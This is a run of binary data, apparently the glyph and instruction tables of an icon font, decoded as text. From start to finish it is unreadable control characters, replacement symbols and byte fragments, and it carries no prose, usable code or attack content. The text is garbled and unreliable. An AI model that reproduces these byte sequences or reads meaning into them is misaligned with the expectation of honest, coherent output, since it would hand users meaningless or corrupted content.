G:71//.# ,+2+3+"5754"2&24"72+"&54&'46343!";265P���e
&�&	#���
�H00P���&&3
0&������+6D`�����@>"{xt� �a��WMYA:7
5
Br�*AK�PX@�h  f  hhff
!
!h

`^(""hk[  Y
O[*&)$

O%#'!![N	[""O""S"GK�PX@�h  f  hhff
!
!h

`f(""hk[  Y
O[*&)$

O%#'!![N	[""O""S"G@�h  f  hhff
!
!h

hf(""hk[  Y
O[*&)$

O%#'!![N	[""O""S"GYY@`����-,��������������������������������~wupnkjge`_^]\[TSRQPNLJGFDB=;10,6-6%#!
++++2+#!"="&=&54626326326322=4"764'&#"3275##"'#"'"&#34237654&#"#&'&#"#"'.5&'&#""'&#"3=2767676327676323276546;254&+326$42242�&& �&4&8
#(		P�


		0D  ��� &`&P�6&&�00LH 	!
 	W
	"# 
		

�`����,@)?kOQE
	+2#5433'���`�88��0��`��!/W@T``	
	
[
YMSG
.-(%!
!2+753#!"=372#5##54;5>;2'54&+"35���P��� �xZ Z�����``��@�#'+/37;?CG�@� Y/!Y.+'"Y-*&

#Y)%	Y,($		M,($		S	GDD@@<<884400,,(($$  DGDGFE@C@CBA<?<?>=8;8;:9474765030321,/,/.-(+(+*)$'$'&% # #"!

0+2#!"5433535355#75#75#75#5#75#75#75#5#75#75#75#0��      @``     `       `      ���`��  @  @  `  @  @  @  �  @  @  @  �``�  @  PPP����GV8@3'$*&%TQ-,+FE<;7654



GD=:	
BK�PX@D`

		
`[Y
Y

[		O		T	HK�PX@E`

	
	h[Y
Y

[		O		T	H@Fh

	
	h[Y
Y

[		O		T	HYY@HHHVHVSRMKJICBA@?>+2"&467'767#53&''7.''7&'#5''3#775367'77##"&54753������X 
  
 ())( 
  
 ())()u
 ������� ())( 
  
 ())( 
  � 
DD	8�H&7HW@T!B=4Ahf
OY
S	GBA98!!%+%++'+/&1"5'&7625462762"/&4?62"&4?'&462+??#		#�pp__�__pp�??"v

v"xpp____pp8�H-P@M"B	jkOT
H'&

	
+642242242"/&4?62"&4?'&462�000�pp__�__pp�000000ppp____pp8�H!#@ 
BOSG+6"/&4?62"&4?'&462�pp__�__pp8pp____pp��=I?@<HDB0 @O\SG?>>I?I97'6&+%#"'&'+"'&'&546;.54673654.5467322654&'?%&

f)
e#'8	9L�-
$2C, 
$ 5� "	����".D@A)#	B[OSG""
+2"&547&54632667&#"64&"67>7�]����& 3�

pp�pp�6<6<�����]93 &@

��p�pp�p@�
4�	4 ``M@JMMMMQ
	E

	+=335335333@ @ @ @ @@����@������
(@%[OSG

+2"&464&#������0ppP��������p�p��������AWx
|	�p
m
�ki��[ZH�E�B���Q���63�����)B

�AK�PX@c
	
`	
	^

h
^ffffhfi

Y
OSGK�$PX@d
	
`	
	^

hfffffhfi

Y
OSGK�+PX@e
	
`	
	f

hfffffhfi

Y
OSG@f
	
	h	
	f

hfffffhfi

Y
OSGYYY@���͝�������zyvsbaUTPOLJ:9+&'&5'#5674'&$2"&4767>7>7>&546'4'.#&'&7>7>7>763226'&#.'&'&73>'&5&'.'&54323&'#&'&6'+"&"&76'"..76"'&?6&54'&'&'&76&'4&76'&'&6'3E	;�𺃃���-&
				
	 	

	

	'
!	 	'B
9��������
	!

		
		



5	5|/��@�	@OSG+2"&54ndnW�W��Z[dd[Z���6@3B[OYQE+73##5#535.5462&264&"�@@@@@*6KjK6kB//B/�D@@@@DE,5KK5,E!/B//B����!7@4BAhOSG! +67'&"1'54676'2+"543j
	c7I,c1+�
1=#�\Q��P�����.:@7'&#"BhMSG#"+#1"'&574'&54>7332757332=3N2%	
%		
	+)�
	
�)&-	u
uu
uk��@�;C@@8	,"Bh[SG7520;:+2+"=&+"56=4?4&'&'>7632327543:4
T	
(#	&!42		�T

8F*ej_F  3	����!*3<@9! .-*"32&%B[OSG+2"&4.'264&"&6767'7&'&'67'�������4'�P88P84=	j4'�4=	������&4=	�8P88P�4'=�&4=	m4'=��@�-u@,( 	B?K�PX@$^hkOTH@#jhkOTHY@--'-V+7!+"&54?675&54632>?632 ��
�, 	/(8��3	 ,&8(��F��(+7'''7'?67>?�5JI5hr	
rP
:	77	:
#5g�(�g5����?G<@9?=3210%$#"B[OSGEDA@;9+7"&5476746=4&=4?5?5657454/&=4?6=4'5/&=47632264&"�08P80		7�6(88(8Q>���@�@ja+2#1"&54674&5476>

 6��db$�A^�/?;@8?:72+(# BOSG+"5&47542"=&47542"=&47542"=&4742.  `  `  p  ]*��
 
�
"
UT(�S
$
��
$
S��$

$
�����b�@ 
	WVRQMLHG.-)($#BK�PX@'`^[PSGK�"PX@(h^[PSG@)hf[PSGYY@_]CA?>;:7642=+2+"'5.'54&'&54#"#"'&'#.+&5475654'5&5475654'5&=<6;KjK-Z-�

	

r�I3	
[77[
	3��
��#�@�[[[		[[
O

[
[
S

G   # #"!
	+4242642&"&46424242&42����`��* W0�@�P ���``�;**�  y007@@(PP����#/;GS_v@s		hh
h

h[\
OSG<<%$^]XWRQLK<G<GBA8721+($/%.#"+"&=4622"&=472+"&463#2+"&463%"&4?62"&4?6"/&462'"/&462.�`�`		D		�	D		C	�		D		�		C		 `�``r
		C		�
C		D	M		D		�		D		����s-@*EA>#BkOSGjhRP+%'&'&4'&'&'&'&+"#"76767676767676767465'&'&'&'&'&'&767676767632�$  #$(%$		%"'%& ! &$
#! 
�			"	!%
& 




	



""
,��)3=GQ[eoA@>[	[OSG
	
+%2+"43"+"4;2"=2"=&?6'&?6/&76'/&76&?6'&?6/&76'&76'pP�PPP    UEE�EE�((�((y((_((�E�E�    `PP PP�((B((1EE�EEiEE�EE
(l(���� `@] Bhh[YOSG
		+2#"&'3264&"#>7#53'7�]��]Gr"8�pp�8"r4��4[[����P@8p�p8@P��4 4[[���� M@JBhh[YOSG#"#"+%7#53'773#"&4632#'&#"32O4��4[[)a8]��]8a)8OPppPO|4 4[[-,4���4,8p�p����3:A:@7A@>=;:9764.-)&"!
	BkOSG.*+2+/&54756764&"#"'5&'&54&'767'i�i2	
CbC
	2m
*+�
+�m[@@9
A$7jEEj7$A/B<D[��7+17=+/3����>@;
Bj[OSG#+'"&46327'364&"�?E$g�ggI91E?��LLhLL?E19Igg�g$E?�pLhLLhL��%1�K�
PX@3	`
	

	^[Y

M

T
H@5		h
	
	
f[Y

M

T
HY@"&&&1&10/.-,+*)('"
+2#!"54;5>;2'3=4&+"5#5##335��Px--��--�@@@@@0�� �@@@@@@����@@?a+!�����@����"d@aB?
h[OS	G""
+642"427'65'"'632&.5�```� O!@P6;<5QQ!O4>�````0(&'�&@	��	@&�d>����5@2hYMTH%+74&546323#&'35#"zV�-)�@2NzVc�Vz ��2@�)?cVz����-A@>)BhfkOSG--4!$	+7+#'#"&547276?54/#&546;2#�$	QQ	$

\

�%
��	%
vv
����8@5

BYMSG+2"&467'57.'#'73������7b??bGGb??bG��������bGGb??bGGb??��`�
":��?K�PX@A	h`fffi

[OSG@B	hhfffi

[OSGY@:810"(+'&7632264&"264&"6264&"7#'&#""/&547632;��=NL�RR�
	DOLG	
MYX>��@
Z�`�			!����84@10" Bh[OSG-&+6"&=4627"&5467632264'&'&'&'&54632�[/6���6/	/^�^/	����b:]��]:b	/�^^�/	����"0@-
BhiOSGM+%/&'5'54?6;2$264&"�		�	�
1d��((�		��
b
1
�E((����;IM@J3B+! ?hhk[OSGIGB@95CA+%64'1/#&#'#"76;235/&'5'=4?6;2327654&#"��
Z
Z
�,l
�	,Z
�
��
�+m
�
X-	1
 �`8M3@0>=10@KJ%$?OSG+642&&'&47674&'7'6%&'&'&4767674'&'7'67���%%�%%�� � 
 ���Z40

&t&

d40

&t&

J(%"
'%T%'


:P%"
'&)*%'"�nq@n^9eda`mlihTQOL"BhfhiO[SGkj[ZGF$+	+"'&#&'&'&'&4?'&?.#"'.767676765'&?6/"7676'4'&?6762?�'7	$k2,1\!a	
2
!&$0)6
%'`374b"
]
*
0#-	2	

!%	9'	0*��@�L�����U@!{��yTZ=�`trBK�
PX@u
^
^h`f^
`]

Z[Y Y	N	RFK�PX@sj
jh`f^
hi

Z[Y Y	N	RFK�PX@tj
jhhf^
hi

Z[Y Y	N	RF@uj
jhhff
hi

Z[Y Y	N	RFYYY@A����MM��������������M�M������~|qonmlkjihgfeONKI1/-,*'!!!"2!+#+=#+32#+;3=;3=36767676'&'&/767676'&'&'&/57#5##5#7327676=4'&'&+535335#5#57"#� 	H
		
C	 .+
	#( )WW)    H

�000	�
0001		
??	

A@@@0�
0@@@vJJzZZv
	
	6	
	��@�59=ER|@y
?>-
3NBh
M
O	

YYMY
QE66PO=<;:696987('&%$#)!+$#5##5#732>=4'&'&+5353353'3535#76764'&654'&'&'2762#( )W		W) (
	�    H	


�&!
@@@@0�0@@@@	cJJ�ZvB		�	
R����JV@S41DHBh[[[	O	THJI$/$(-
+2"&464&"46?&5463232654&#"'&54632#"&'3������0pp�p8(1,1=.VJ>PC6��������p�pp�8
z!	"
E2&/?,	C5WM4CV4
����BE@B9
>Bh[[OSG($/$%#+2#"'6?32654&#"74676'&54632#"&7>54&#".54����]"'6CP>JV.	=1,2(<J����	 >VC4MW5C
,?/&2E
"	!	hnD]����Ve~@{T;,B>A	

	h
fhhk

[Y[OSGed^\QONMLKJG:;%#
+"1/"#.'"547>;%#"/.'+"=>?4676.'&5467;67263632654'&#"2'2&."�	

J
	M	/!*VM


:' +3=&23%	
"#/	,"	
:3.�%43%%34%! �`>�@,)"3210+*! BK�PX@0`k[O	
YSG@1hk[O	
YSGY@;:8765#+%"&46;&2#67#53&''7.''7&'#5''3##&548@a��$  ())(
  $�T�]2.,,)(
  
(),,.2]����#@ BOSG"+4&#"312765'4?>5�$%

	

	

 2NN2&�
		
�% ``M@JMMMMQ
	E

	+73#53353353`@�@�@ @ @��``��������J@G	B[Y	YMSG
+7"&547462#354"5#75#!/B/!(>p)!//!*22� @@����7C@@/B		jh[OSG65$%#%$%
+%#7.#"4&#"#"&542326=.#"4&#"5467542X�Wy0% 
yW ���Y -�&
� X���[_cgt@q?T32B		h	f

hh		[
[[OTHgfedcba`_^]\ZYDC>=97,++?"&=47654'&'&'&'&'&5462132=4'#5&54627>7675'&546224"624"24"�
:
*	
	&
'�  `  `  �\!("


	
�
	� 	
^ ` ` ���1AWbp@Qnjgc	_
BK�PX@>	`		^hfY[
O
THK�PX@?	`		fhfY[
O
TH@@		h		fhfY[
O
THYY@32poihb`[ZTSIH:92A3A)&.+7#'4767676=4.'&'&'&5476;2'2?676'#7"/&'&'&767354"32'654'&"2�	
-R`-�;'
�	v
B
��^	

^$3VW2$)B).>(c

*
(7����!@@a+'&"&47>'&76766'&�@
�
'�2&9
7��M$
�'
�<488
����	@x�@�ged^;:8

s,XLVPBa>Ahhhh[O	
[S
GBAvuon\[ZYONJIGEAxBx#"+"'&'62&'&?67&'"#"&46;76367&'&'"'&76>2#"'&#2'&7&'5>7>?67&76#2W	%l%	/��A'=+

$


	J

$

+='A	
A%%?O",�3 +/ !

o/+ 3�,"

! ����
@		?a+'?'7>}�[��	
-[-
	��Uu�[�	
-[-
	��U ��@�5=En@k) *
	B		h	
	
f

OYY

[OSGCB?>;:761/%$
+##5#53533"&5475&546267>367>&"264264&"@0@00@@@6&4&  &4& 

 �.p@00@00�"+	&&$�$&&$����p%������@�dk��Ԭ
F- B�jA

h

f
h[OO[	[OSG���������ɿ���������������vt[YXWVUEDCA@>=6!!29+%+"'56274%36+"'&'=%#&"#&#""&#"'"&#&"'4'&54&547676767"&"#"'&547676>767676327&6#"&"#%76276&'&'&"7&'&:>232>>'.'&"275&6262376�+
 
�	
 
+�
 
P6Q
 

	
,001/,
	
�V

0�0

(3N3((�
	#B#	
��(9

f0

07			

	a8	�		N

\
	����"3DGKt�"@*>;D&l~[ZE4-%
0	
	BK�PX@�hhfh``
	
	h		h	f[[\\

Y		O		T	HK�PX@�hhfh`h
	
	h		h	f[[\\

Y		O		T	H@�hhfhhh
	
	h		h	f[[\\

Y		O		T	HYY@GHH$#������|yvutqkjdcbaWTPOHKHKJIGFCA=</.#3$3 
+%53!537#"'&"'&'#.54632227'27654&'&'&"'&'&#"'353'#54'&+"'&7'&'&5463"2;2#4'&+"&7>'&#5232H��Z0r5?�]#!4?�]#!\7-� 1)		� 2)		6-�** (		
 6&	�0000�i>]�	i>]��� �-70PG-61Q �*000[
)"�����(+5%''7�ppP�P��S����@pp�aC����������o@l�����tkgA
@<54321JIH0/)Z RB6A�n@hfO[QEyw>=-+'&#!+!6'.7675'#"&/3326?''>./"'67676=&'.'&476?.7>7>7654&/66'&667>54&�			

��

 .'
			-1(.$��!6	M;
(



%

,	 	
	
	

"
	*A	�;-&#��~�_�.7?f�AN�
3�
�������	��������Z

O4a^*&u'		B��
\AK�.PX@t
	
`		f		h	^	f	f
	
f
	
f	fhhfi		[OSG@u

h		f		h	^	f	f
	
f
	
f	fhhfi		[OSGYA*88WUQP8?8><;6410������������}|qpKH0. +674'&#&'&'"&'.>'4&4&>32>76&6&7>767>76'4&546;26&/.'&"37&76476'&'7./&54'&'&'&'&76'".5&7627654&"&#"6'.7&'&767676'>372/&'&76'7676767>7626'&+72'&#>'.546'&##"'&7>��

#,
!
	

#%�


	
'	�	
		$	
	

	

	
f7�		

"[��
		

 
%!	"(
0
&H		
V		"*	

	





)




��		
	#	 @`%@"MYQE+%##5#53533@�*��*����*������g�BK�PX@$`iYMQE@%hiYMQEY@	75+#!"&54?63!27#5##'!'!�
��
!

�Q\Q =��\
��!
'

��..�Vk.@+B@?MQE+%!'7V��w��x�*x��x���K�PX@,^Z
	Y		M		S	G@+jZ
	Y		M		S	GY@
+%#57332#!"&546;5335!0`@0��0�H�а``� ��  ������0@-BjOSG+%2#"&546;276k		��	K	
	/0]/'u	K	ԗ		)$	/]0/	��G@D	h[[OTH

+64272#!"&546;73264&"�~y��X � �\BB\Bi~~���  ��B\BB\��D@A?h[OTH
	+2+5#"&=432+'#732=X�Z9
�9Z�'���	YY�?	�	YY'�+*U�	(+''7'77*wwwwwwww7wwwwwwww��	2@/BY[OQE+%!>722"&4267#->
��
>-"R`nMMnMe>2�n:&&:&MnMMn�#��	"5t@q%0
.	 	B

Y	Y
	
	[[OYQE###5#531-+(&""'+7!>72&2"&4267#&'67327'&'632#"'673267�!-	��	-!>JV??V?Q2(	�	�"
C�
2 9+??+(	h
;##;
�>X>>X}j(
L�;1>X>	 �`]�BK�	PX@ `YOSG@!hYOSGY�'4+%#!"&5467>32#7#5#�'6;)��2F>-G+6R�DddD@�9();F2.D%,EgddL �`EK�PX@^OTH@jOTHY@
5!+32#!"&=463�+���`0������71@.'

	BhOSG$# %+%#"&'5'45'&>65'&>235462?>?6�`-7)@:
"
*�g"0%�X������*��%@"BjMTH52+%#!"&5463!2!'���*��J*`J+*�`�`����'F@C	B		[Y[OQE%$
+2"&43##5.'#53>753264&"�B//B/!!`C*C`!!`C*C`�|WW|W/B//B*C`!!`C*C`!!`�W|WW|�p*@'BOSG	+2#!"&54635'���e���p��
[+uu+u��@�3@0Bh[OQE+6"&=46273#5.5326�8))8)4'P9.9P'HbH�(�((�#:WRRW:2BB����
8@5B[MQE

+!6'3462&"347'��zh=V=H@.����(_�`�+==+N.  ��UT�@�@MQE+=!@�**��>@;B?[OSG#&+%'5'#"&4632"264&"n!m(5;SS:;S"�R::R9�n!n"SvTT;5(9R::R���(+15-5*����++������;C6@30%7B[OSGA@=<,);+%/+"/&'/&?4&465'&?66?6;276264&"n/+6	U	6+-.+6	U	5+-�>,,>+�"G77	G	""G77	G	":*>**> �`@@?a+%5"675��Oi()�ȓX49�U��	�(+77'?�}!n�99�n!KK�`��`�����X@UB
Y[Y	O	SG	+7537"&4632764&"53�0�(p�ppPA5!xXX|XX�����5APpp�p(!��X|XX|Xf00��56@310%$?[[OSG+62"&4'654&".5462&2'>54&".54�""�#)1D1)#IhIӬz9/&-a�a-&/9�""!9$0"00"0$9!3II�yU8^$L-DaaD-K$^8U��)<n@k%40/$:;
BA@?h[[OTH+*9731*<+<&+('+#"''7&'>3277&546;7&#"2654'327#"'X/96':2*MGI@f:..M��3%5Z%52


"E/MGMFCN�	
26�6%3� AcU@R?
X@WP.+%#J/B@I?jj[OSG][US20*(5'+%#"'=4&+"'3276?#'.'&767676?%567676'&'&#"567632�
		P/?
	��
	
)+-
o>��\)
	

a--"	�
	�

��f
�*
%/;0 1	K5
+5FY�@�E*=S
Bh

h		[[[[

[OTHHG76-,VTJIGYHY<:6F7F21,5-5$#$#$"+#"&54632&2##"&/#"&46326323747"264&"327'.7>&"#'&'3264&�,:()C��
+F&�f	
�

	
� ))0N*O>(	 
p
 ����&5&@#4%BOSG,++7&5474'./6?%&62&&"'767>?_2-M.&9-2'
*3M��)8�8+
�+B�B,49�IF=JfC"

!CJ=FI.

2CI	''�48JJ66/%Vk-@*B@?MQE+=!'7'7w��x�*x��x����%)/w@t,*&"	B+Ahfff		f		f[
O
TH/-('! +2"&464&"#6#7''6323&54'3'7#"������0pp�pp8�fH!81N<�fH!�8��1N<��������p�pp�pVV>��*7�Z~��*7�V>Z~����3@0
@?MQE+%'''75'77��h8VV8h��m<VV<m�@
� �� �
@� �� ����� ,-8EZgtj@gomhf_-( BMAh	f[O
[SG!!^\YX54!,!,&+7"&54?632"'&/&62'7/1&761&54?66&767.7>'2#"'6?6767'&7>'6�%W1	@>
9�:<+1"�2,
	(+G< "
�
 
aY\
#B/7
B"4"##2$68�@?	+
	 `Zfjn~���@1�<:	@>

qouHxwFDB AK�
PX@�
`

^ff^		hf

f

fffh ^^^Y"![ZMQ#EK�PX@�
`

^fff		hf

f

fffh ^^^Y"![ZMQ#EK�PX@�
`

^fff		hf

f

fffh f^^Y"![ZMQ#EK�PX@�
`

ffff		hf

f

fffh ff^Y"![ZMQ#E@�

h

ffff		hf

f

fffh fffY"![ZMQ#EYYYY@O��kkgg[[��������}|{yknknmlgjgjih[f[fdc`_]\WVUTSRKJCA10/.-,&%#"$+!!7&47##27654'&'&'&'"'&"#5334'.'&#5#"23&'&'&5#33527>5"&5#346$42 42'"#52'>3.545!��!!a&�

�&a!!q�t@@�$�`� &t&&P;
			#
		P&&t&@@@@+�  �Fp��j@BK�PX@;
`
		^[[		\OQE@=
h
		f[[		\OQEY@omgeba^\NLIHEC#.#F+!!%4'&'&+"2767653#"'&'&'&5476767632#54&#"325'53#"'&'&'&5476767632#54&#"325��5$ff$58(�(8\5+

%4�5+
&4����,$66$,B66B(

*
(

*
����-BL@I(@!87	BhkOSG?=53,+ 
+2#"&=4?6'"/&546?63#"/5&=4632��
�
���.
���
	\�Y1a`R��\	
�Y��@�,@,*
	Bja"!&+%1#"'&'&'&=>76'676/267)1U
E!1Gf�'+/)H
 *S0$H<gG���@
@a++7&67#".654&/`G !_ "+"R

)

(�M�5(>*)?(MSD(

$,(

$����"$@![OSG +2"&=4'&54264&"���	 #&4&���jj�j�/!
(,!%SW"�
!Q&&����2EN@K
h		h
[[		O		T	HECA@><861/##&$"$+2"&4327623276'&#"6'&#"#"&'&#"32676'&#"3276232������G		

0	
<%&<
L/.J!


		������Z

	
D	"('\	



��*?)@&<
B/"! ?ja?>)(+7'&47>76767'4&5&737.'&'.'&6765762��""S)	

[	h.}""D+W�S
�#e#
)8l+c	�#e#F< ����$,4<j@g
	B[[
[
	
[		[OSG:96521.-*)&%#!	$$
+%2#"'#"'"&5475&5462;6&"264264&"$264&"@&&$
]B &4&  &4&0@
�.�&4& Js$&&$�$&& 5 ���n���"F@|B'	,
	!Bj
	
	
h

ff	[OSG$#@?>=;9541.+)#F$E
+#36;#"&=32276776#"+"=4"+&'"4#&'5467�w5#5K<|<=

@4H!1 
3!J5���:!
A/����@.
VU.A����$,4<J@G
Bhf[OSG	+"&5475'5&546275&5462$"264264&"264&"� � &4& � &4& `` &4&��R�`$]@5$&&$5@]$&&$5005$&&��.����!0BJ@G8Bhf[OTH@=74/+&%		+2+"&=46354&+";26554&";25754&+";265R.@@.�.@@.!z"g�B/�/BB/�/B�f
e��f
e �`A?@<*@,BhO[SG;9/-" '%+7#"&76767632&'&'&#"'.76&+;.'&'6`>HF8+9@\+9@\??UY&S�i�%#&%=_B>6$�&#W�#W?
$-7@.g
+*� =@:MMMQE
		+15333353� � ��� ������#:BR@O43-$B5@[[
[	O	SG@?<;+2"&5475&54264&"264&""&54754'&#'76264&"&4&  &4&  2?!&4&
'``@ -�&$�$&&$�$���&&&%�@``@4���
 +�K�	PX@0h^[
	O
	T
H@1hf[
	O
	T
HY@"!)(%#!+"+ !#+#546;#"%2#54+553+532!3#"&=300$CD4#0
CP0#DD��DC$0DDD#00#DD0��CC$11$CC��
*@'[MQE+"3#4637"3#463�>B�`"�>B�`"�B>�"@B>�"��`�	 (X@U	B@Y[[OSG
&%"!
	+&/'73+'32"&4264&"62"&4P@%>mS>%@�C55P5jKKjKXP88P8;J33J3�`�/��/�`pp�KjKKj�8P88P�3J33J���� 'O@L!%B$?hi[[OSG$	+2"&462"&4264&"327'#%#'76�J33J3#jKKjKXP88P8
+B"00`-S`0(- x3J33J[KjKKj�8P88P62JjP��PXb
����3F[K�PX@ `[OSG@!h[OSGY@31-+)'! +2"&46767676'&766'."3276323276'.76������q	
	
2	�
	/:/	
0"0	2
	
	�������
	R	

	Q	
���� (,7U]q@n-HDQP	B	A6531@jjj		h[
O
SG98[ZWVSRGF><8U9U#-
+#"&46327>?264&"624"&'&712#"&'&'&'?37757376264&"U: !!	&����  !X��!!
	LV#$ 

$&4&
%
;��y� 	x;�m&4&)		%
`��>�-1N]@Z1.'Bk	[
[[OSG32GD?<962N3M+($#+2+"'&54636&+"27676;26?>72+";2+"=43.
1Hs��N>
:U
	K@>
6F)93�#�
|@	��&Ym3,	

$	?���>�=A@>0-B[[OSG<952,)!	+2+"'&5463>76&+"7676;274676&+"&=4;271Hs�3�	F	@	R
`
�9mR	
�
|��Rm
	��T
-


�'6E~�BK�
PX@*`	[[OSG@+h	[[OSGY@DB=;20+)''%!/
+#"&54767&547"#"&5476;&#"32654&'654&#"327�%+I>59(E'.!"9j!D,2)$'
#
"n%'!	
&9*&

0'�$#w
 <
: �)8HC@@%$Bh[[OSG%!%/&*&	+7#"&54767&547#"'&5476;#'327654&#"4&'"&#"326�KA8;*8*#%:�<

k
	y%,$#�(;.(
!*!
z
6
���#8J@Gh[	Y[
O
SG%$43/-('$8%73553+#!"&5463!2"264754+";22=##"&547#3��� �B//B/P004 !/.B5
P��!T/B//B?00��
/ !B.�	��)>��(#BK�PX@:`
h[Y[		O	T		H@;h
h[Y[		O	T		HY@><9841-,'$
+642'#54763!2#&'&#"54&+";276653#!"'&=332p��U T!/.�&&P P
��Q !./p���p
p!''� /��/ !��@�(7}��@,���rfc�s
�S1$	�R2
B��BAK�PX@L		h		f

h^
fYY

YMRF@M		h		f

h
f
fYY

YMRFY@�������������nmedMLFEDC#"
+7'&'&54767655654'&'&'676767#5"'&'.'35'.'&'&54767676753#&'&'654&'&'&'&'#/53&'&'&'&/5#13&'&'&'&'#35767676}
	
	
�


	
	I
@E 	@E


	

&
 	


	$
 Y�f\

	^
	�I	
	k	D
##2
	x
!! j

W
	
	�

	�	

!!��@�EP_L@IG:.+YF;ZB
AhffMQE65-,+%#5"'&'.'35'.'&'&54767676753#&'&''5654'&'&'67676;
@E 	@E

�	
�
	
	�
##2
	x
!! j

O\

	�	
	k	@�@4@1[[OSG		+$2"&472+"&463264&",((05KK5�5KK5�B//B/�((lKjKKjK�/B//B@�@'G@D	[[[OSG
%$! 

+#";264&'2+"&463"264&2"&4@�(88(�(88(5KK5�5KK5((QB//B/ 8P88P8 KjKKjKP((</B//B����*3=9@6<:-BjYORFA!.+;!53275&'&'&'&'=35;3&'&'#67#6�)#*)
�
[,!)P��Q�s33k35YM--
!
  .$-*7@#s51V/$$/V1���	(+''5'.'7��\��  f
+)..)+	��o<Uf��PR$$RX����P@M
B	?YMQE+?753'7'7'7'53�000�0�� �-.�--�.-@�000��0��@@--C--��-.x  ����<@9hfYMTH	+2"&45#5##335z�zz�z;V*VV*�z�zz�k*VV*VV����
N@K
	B@h[OTH

+'7'7'5&2"&42654&"�b�aa�Ue;�qq�q�|XX|XC!R! S!S�o2=Up�pp��W>=XXz����9@6YYMSG
+2"&45#75#z�zz�z�000�z�zz��((X��	 @`#~@{

Y	YMQE   # #"!

	+5353#53'5335373+535353P(P�PPP(P(PPxP(PPPPP�PPPPxPPPP�PPPxPPxPPVk@?a+7'7�x��xk��x��w����
#@ BkOQE+2"&47#z�zz�z�`��z�zz��`�@?a+!������
@
	BOSG+"&4625�z�zz��`�zz�z�`�@�@�(+'��@������
@
	BOSG+"&4627'&�zz�z�``z�zz�
``@�@�(+��@������
*@'	BjMTH

+"&462'�z�zz�
``�zz�z�``�@@a+57�����Vk@@a+7#'7'�*x��xw��x����'<@9hf[[OTH+3"&=462"&=326=4&"265� EbD2F3. 
.2F3@�1DD1�#22#���		��#22#��:@7BAhYMRF+7'5!3!5337!����k�kK�+�ꫪ++��((*��*2:e@b	B	A[		Y

[YOSG87430/,+**'+"&4622"&4264&"/#5'&4?63232"&4264&"9L77L8C6&&6'+' =	H	
";��L88L7B6''6&=�8L77Lg&6''6�-- pV&
	E	< %8L77Lg&6''6����"';�@9(&%$ 	2/	BK�
PX@9^
h
		hiZ		O	S		G@8j
h
		hiZ		O	S		GY@##;:655310.,,+#'#'"!")!)+7'&76?546;7332#"'#"'#753#"'"'+26?243&@`@&3/''./&&0+��+9$2(Z(2$5'\#�	
b55b

�++**T))T��$  �
@?a
	+2'463������@@X����)-1i@f%"B
Y[	YMQE..**.1.10/*-*-,+$#
+"3=7>54'#5'%'2#5.54#5!#5P80@K*�&��&&�hL@�#`@��@8(8
GG
,(�@@6&&&&L4J%gg;#4****`�'/7;H@E#Bh	Y
		[OSG888;8;3=+=4>2+"&=#+"&=.264&"264&"75!58P85
		
�
		
B�@�`�##�
'				'
	ijj����(@%

	BOSG+2"&4'7''7z�zz�z8KKKKKKKK�z�zz��KKKKKKKK �`!)-@@=Bk		Y[OQE-,534
++"&=!+"&=76;2264&"264&"'!'#S-		�		-�����* �Kv�				�v�YU����$,A@>"BY[[OS	G*)!$&!
+62"&43!2+;#"&54?'#2"&4i""PD4
K���J*5""F""_*� (3���""��@OSG	+2#!"&5463U�����*��(@%YMSG
+!!2#!"&5463U��*��U��U��*��B@?BhYMTH%3+77'53#!"&546;#iB��`
+�����B��`���*+����*@'BOSG	+2#!"&54637''U��j��L���*���M����=@:Bh[OSG##+77'3"&4632&#"26{@��]*z�zzV(& Eaa�a�@��]
Vzz�z a�aa����%�K�	PX@2`	^[
Y		M		S	GK�PX@3`		f[
Y		M		S	G@4h		f[
Y		M		S	GYY@%%$#"! 	+2#!"&546;>2*264##5#U��W#,#5�(�(p��:

��@HH������oK�PX@(`f[OSG@)hf[OSGY@		+2"&4264&+4&#"#"3z�zz�z.1"-&%�z�zz��,#0#&2% �`+@(BjOTH'4+%#!"&5467>327''�'6;)��2F>-G+6R��o,�9();F2.D%,Eƍo- �`&>@;h[[OSG" &%'4+%#!"&5467>32264&+54&#"#"3�'6;)��2F>-G+6R##@.&:
!//!�9();F2.D%,E�#2#
.@-#/B/ �`@jOTH'4+%#!"&5467>32�'6;)��2F>-G+6R�9();F2.D%,E��%-5M@J
h[O	\SG32/.+*'&#"+2+"#"&46264&"6264&"264&"264&"�Oq?,&
	Ppp2S}S�dG,>
	p�p�Ch����-@*BjkOTH+62"&4&2"&47�C�����U�U�ք������U����K�	PX@.^_	

ZMQE@,jk	

ZMQEY@$

	+=3#=3#553#3#53�33��MM�3M3�M�M�3�̀3M33�zz@@a+57#'76�P�Pz(P(3P�P�*(P(3@�	ZK�PX@ ^ZMSG@jZMSGY@



3+75!+"&!5373 � ��Pj+��F    ����A@>	BkYMSG

+2+#57#"&54635!��*�*�j�����0  0����@�
+@(BjMTH
4++"&54633'����pp���P�p-S	

�
(+'73'7'7���|��z\� z4����{[<{.�R�(+?'7z� ��z l���z��@@a3+%#!"&=4?7'�����૫����ee�pUU�� X@UBhhYYMTH
		 
	+?#53'72#!"&=3!!#5463�7��8kk���+*��+s8*8kk+��UU*UU���K�	PX@/`^
Y	M	R
F@1hf
Y	M	R
FY@ 

	+%53#5#53#%#533#53M3�MM�3��3�MM�33M�33�MM�3��3���--@*, 	?OSG$"+2'.54632667654&#"'&#"7.0B;.44.;B09%%_(0"**"0(_		�B15D,00,D51B,,��X"2*#0!!0#*2"X��@?a"(+3'.54632632�4.;B09%%90B;.40,D51B,,B15D,0@�#'+�@�M	Y
Y


YYQE(($$  (+(+*)$'$'&% # #"!+3#5##5##335335#75#75#5#75#75#(((�((((�(�(((((�(((((���++++�+++�++V**U++�++V**U++ �`�PX@^\OSG@j\OSGY@	+2#!"&=46;54#!3!2����+���j0��0��0�P:@7YYMQE
	+753!!5!�`����@P 000 0y22����(}V@SMKHGE@?>PA:[V#!|id+BhfkOSGkjXW<;87+2"&4>4'&'.7676'.'&'&'.74'767'&'&4'.'.'263&'/>76636.'&#66z�zz�z�		*4+�#

 ,	

	

 )$!	

6�z�zz���		


0DJ4++#/	&
	 	



	 
��`�
k@
A?K�PX@#`YMTH@$hYMTHY@
+25"&45#3375#33g�geKIg�>g>�eGD�$Gf�R==((==(����%:@7[	[		[OSG$#
+2"&4264&"6"&462"&462"&'3z�zz�z��aa�a��NH9
�
�z�zz��a�aa�Z�'!!��
@@jja+3#5#7##5#�b>��>b`������#�K�PX@6		`
f^^Y	NSGK�PX@8		h
f^fY	NSG@9		h
fffY	NSGYY@! 
		+%3#!"&53"&5463!2!264&"�KA��AKj��j� 
��5����
��R@OYY
Y	M	SG	+2#!"&54635#75#75#X��Ƞ�������0��00X00X00��@�'A@>[	[OTH   ' '$#	
